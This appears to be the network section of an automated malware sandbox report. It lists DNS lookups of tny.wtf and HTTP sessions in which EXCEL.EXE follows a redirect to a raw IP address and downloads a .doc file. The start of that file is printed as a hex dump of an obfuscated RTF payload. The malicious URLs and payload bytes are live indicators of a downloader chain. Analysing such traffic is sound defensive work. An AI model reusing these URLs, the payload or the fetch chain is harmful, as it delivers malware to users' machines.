                    Jul 26, 2024 12:42:51.775110006 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775116920 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775132895 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775135040 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775147915 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775160074 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775165081 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775170088 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775182009 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775187016 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775197983 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775201082 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775211096 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775214911 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775218010 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775232077 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775247097 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775253057 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775274038 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775283098 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775341034 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775613070 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775630951 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775645971 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775676012 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775688887 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775707006 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775723934 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775738955 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775748014 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775757074 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775758028 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775772095 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775774002 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775789976 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775793076 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775809050 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.775809050 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775830030 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775841951 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.775877953 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.776995897 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777014017 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777029037 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777044058 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777060032 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777061939 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777071953 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777077913 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777082920 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777093887 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777095079 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777112961 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777112961 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777123928 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777129889 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777148008 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777151108 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777163982 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777182102 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777548075 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777565956 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777597904 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777599096 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777600050 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777606010 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777611971 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777622938 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777635098 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777640104 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777647018 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777657986 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777658939 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777671099 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777676105 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777693033 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.777718067 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777729988 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.777780056 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778544903 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778563023 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778578043 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778592110 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778594971 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778611898 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778613091 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778613091 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778628111 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778628111 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778642893 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778645039 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778661966 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778665066 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778677940 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778678894 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778697968 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.778698921 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778712034 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778733015 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.778784990 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779452085 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779469013 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779484034 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779499054 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779500961 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779515028 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779515028 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779534101 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779534101 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779534101 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779546976 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779553890 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779561996 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779566050 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779567957 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779584885 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.779597998 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779609919 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779628038 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.779683113 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780395031 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780411959 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780426979 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780441999 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780448914 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780452013 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780456066 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780457973 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780467987 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780473948 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780504942 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780504942 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780504942 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780514002 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780530930 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780546904 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.780575037 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780586958 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.780702114 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781169891 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781187057 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781202078 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781217098 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781230927 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781233072 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781245947 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781248093 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781258106 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781265974 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781270027 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781281948 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781295061 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781295061 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781297922 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781311989 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781316042 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781333923 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781337023 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781353951 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.781358004 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781369925 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781397104 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.781445026 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782089949 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782105923 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782120943 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782135963 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782143116 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782151937 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782155991 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782169104 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782169104 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782186031 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782186985 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782202959 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782203913 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782217979 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782227039 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782234907 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782238007 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782250881 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782253027 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782268047 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782278061 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782290936 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782301903 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782931089 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782948971 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782965899 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782973051 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782979965 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.782982111 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.782996893 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783010960 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783011913 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783025980 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783436060 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783452034 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783467054 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783482075 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783485889 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783498049 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783499002 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783509970 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783516884 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783521891 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783533096 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783534050 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783550024 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783555031 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783565998 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783566952 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783576965 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783585072 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783600092 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783606052 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783617973 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.783620119 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783649921 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.783659935 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.784226894 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.784244061 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.784276009 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.784287930 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.784297943 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.784316063 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.784331083 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.784348965 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.784357071 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.784365892 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.784369946 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.784383059 CEST8049168104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:51.784384012 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.784400940 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:51.784421921 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:52.883299112 CEST4916880192.168.2.22104.219.239.104
                    Jul 26, 2024 12:44:25.061460018 CEST4916580192.168.2.22188.114.96.3
                    Jul 26, 2024 12:44:25.061589956 CEST4916680192.168.2.22188.114.97.3

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 26, 2024 12:42:40.596302986 CEST5456253192.168.2.228.8.8.8
                    Jul 26, 2024 12:42:40.611804962 CEST53545628.8.8.8192.168.2.22
                    Jul 26, 2024 12:42:42.845001936 CEST5291753192.168.2.228.8.8.8
                    Jul 26, 2024 12:42:42.858674049 CEST53529178.8.8.8192.168.2.22
                    Jul 26, 2024 12:42:44.961148977 CEST6275153192.168.2.228.8.8.8
                    Jul 26, 2024 12:42:44.969079971 CEST53627518.8.8.8192.168.2.22
                    Jul 26, 2024 12:42:44.971009016 CEST5789353192.168.2.228.8.8.8
                    Jul 26, 2024 12:42:44.981172085 CEST53578938.8.8.8192.168.2.22
                    Jul 26, 2024 12:42:48.913590908 CEST5482153192.168.2.228.8.8.8
                    Jul 26, 2024 12:42:48.927954912 CEST53548218.8.8.8192.168.2.22
                    Jul 26, 2024 12:42:48.929590940 CEST5471953192.168.2.228.8.8.8
                    Jul 26, 2024 12:42:48.987308979 CEST53547198.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 26, 2024 12:42:40.596302986 CEST192.168.2.228.8.8.80x7878Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:42.845001936 CEST192.168.2.228.8.8.80xc281Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:44.961148977 CEST192.168.2.228.8.8.80xf9bcStandard query (0)tny.wtfA (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:44.971009016 CEST192.168.2.228.8.8.80x13bStandard query (0)tny.wtfA (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:48.913590908 CEST192.168.2.228.8.8.80x1100Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:48.929590940 CEST192.168.2.228.8.8.80x2664Standard query (0)tny.wtfA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 26, 2024 12:42:40.611804962 CEST8.8.8.8192.168.2.220x7878No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:40.611804962 CEST8.8.8.8192.168.2.220x7878No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:42.858674049 CEST8.8.8.8192.168.2.220xc281No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:42.858674049 CEST8.8.8.8192.168.2.220xc281No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:44.969079971 CEST8.8.8.8192.168.2.220xf9bcNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:44.969079971 CEST8.8.8.8192.168.2.220xf9bcNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:44.981172085 CEST8.8.8.8192.168.2.220x13bNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:44.981172085 CEST8.8.8.8192.168.2.220x13bNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:48.927954912 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:48.927954912 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:48.987308979 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                    Jul 26, 2024 12:42:48.987308979 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • tny.wtf
                    • 104.219.239.104

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249163188.114.96.3802092C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 12:42:40.667469978 CEST317OUTGET /dGa HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: tny.wtf
                    Connection: Keep-Alive
                    Jul 26, 2024 12:42:41.799470901 CEST717INHTTP/1.1 302 Found
                    Date: Fri, 26 Jul 2024 10:42:41 GMT
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Location: http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tt5RL%2BQuDlamNY8Kfj3gf4YnbaWTEPmlzOv6EVu0u8uAbmr%2Bv3BSswM9au5wHC0kajrlFB7uQdP0bhZhxYQTnhmlKN67ljQhdD1I9iu8qFYNdkx0%2F2E1GF2l"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c8cec8a141f5-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.2249164104.219.239.104802092C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 12:42:41.813411951 CEST448OUTGET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 104.219.239.104
                    Connection: Keep-Alive
                    Jul 26, 2024 12:42:42.343767881 CEST1236INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 10:42:42 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                    Last-Modified: Fri, 26 Jul 2024 01:46:43 GMT
                    ETag: "14857-61e1caef74ae3"
                    Accept-Ranges: bytes
                    Content-Length: 84055
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/msword
                    Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 67 72 6f 75 70 54 6f 70 39 32 30 34 34 33 31 37 32 20 5c 28 7d 0d 7b 5c 36 36 34 31 31 36 38 35 34 2f 3c 60 3f 32 3a b0 7e 35 37 24 2d 7c 2d 2b 5d 2c 7c 32 2f 3f 35 24 2c 3b 5e 3f 2b 21 2e 38 2f b0 7e 5d 25 a7 2e a7 36 5e 33 2f 3b 38 a7 34 23 5b a7 2e 3f 3e 29 3a 35 40 32 3d 3f 30 3f 3f 39 37 28 2b b5 36 b5 23 2b 60 27 35 3a 29 3b 2a 28 35 3f 3f 40 37 b0 3b 36 3f 26 34 25 3a 32 35 5b 37 35 36 3f 31 3f 5e 5d b0 26 5b 26 26 26 2b 2a 3e 37 2d 25 31 3f 38 3f 25 36 24 2a 21 3b 7c 23 3f 5f 32 30 3d 2f 21 7e 2b 27 25 3f 3a 3f 25 5b 34 27 5d 3f 2f 2c 7c 3f 60 38 28 3f 5f 23 2f 29 31 7c 3e 39 25 2d 60 60 60 36 a7 36 34 3b 30 37 33 2a 25 25 2c 24 3f 33 25 3c 2f 27 27 40 2f 5f 39 27 a7 3f b0 34 60 5f 2c 23 31 24 60 3e 35 23 2a 3f 36 3c 7e 3c 27 3f 3d 3b 26 25 30 26 23 3f 2f b5 3f 2a 24 3f b5 26 2e 2e 37 5d 23 3f a7 3f 7e 3f 25 2c 3f 23 38 2f 27 26 29 3a 3f b5 34 24 3f 37 37 2a 34 2a 5e 37 30 3f 36 3f 2d a7 a7 29 5e 5f 60 3f 39 3d 3a 25 60 a7 [TRUNCATED]
